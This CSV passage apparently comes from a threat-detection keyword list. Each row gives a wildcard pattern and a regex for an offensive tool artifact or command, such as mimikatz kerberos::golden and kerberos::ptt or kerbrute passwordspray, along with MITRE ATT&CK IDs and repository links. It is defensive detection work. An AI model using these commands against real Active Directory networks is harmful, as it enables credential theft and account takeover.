perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::clist*",".{0,1000}kerberos\:\:clist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::golden /service:*",".{0,1000}kerberos\:\:golden\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::hash*",".{0,1000}kerberos\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptc*",".{0,1000}kerberos\:\:ptc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt *.kirbi*",".{0,1000}kerberos\:\:ptt\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::ptt*.kirbi*",".{0,1000}kerberos\:\:ptt.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kerberos::purge*",".{0,1000}kerberos\:\:purge.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::tgt*",".{0,1000}kerberos\:\:tgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos_enumusers.*",".{0,1000}kerberos_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kerberos_steal*",".{0,1000}kerberos_steal.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*kerberosv5.py*",".{0,1000}kerberosv5\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Kerbeus * by RalfHacker*",".{0,1000}Kerbeus\s.{0,1000}\sby\sRalfHacker.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbeus_cs.cna*",".{0,1000}kerbeus_cs\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbeus_havoc.py*",".{0,1000}kerbeus_havoc\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*Kerbeus-BOF-main*",".{0,1000}Kerbeus\-BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerbrute -*",".{0,1000}kerbrute\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute bruteuser *",".{0,1000}kerbrute\sbruteuser\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute passwordspray *",".{0,1000}kerbrute\spasswordspray\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute*bruteforce*",".{0,1000}kerbrute.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute.go*",".{0,1000}kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute/cmd*",".{0,1000}kerbrute\/cmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute/util*",".{0,1000}kerbrute\/util.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_*.exe*",".{0,1000}kerbrute_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_darwin_386*",".{0,1000}kerbrute_darwin_386.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_darwin_amd64*",".{0,1000}kerbrute_darwin_amd64.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_enum*",".{0,1000}kerbrute_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_linux*",".{0,1000}kerbrute_linux.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_pass_output_*",".{0,1000}kerbrute_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_user_output_*",".{0,1000}kerbrute_user_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_userpass_wordlist_*",".{0,1000}kerbrute_userpass_wordlist_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerbrute_windows*",".{0,1000}kerbrute_windows.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_windows_386.exe*",".{0,1000}kerbrute_windows_386\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute_windows_amd64.exe*",".{0,1000}kerbrute_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kerbrute-master*",".{0,1000}kerbrute\-master.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*KerbruteSession*",".{0,1000}KerbruteSession.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*kernel_shellcode.asm*",".{0,1000}kernel_shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and 